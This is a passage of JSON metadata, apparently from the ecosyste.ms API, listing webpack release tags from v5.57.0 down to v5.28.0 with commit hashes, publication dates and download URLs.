ste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":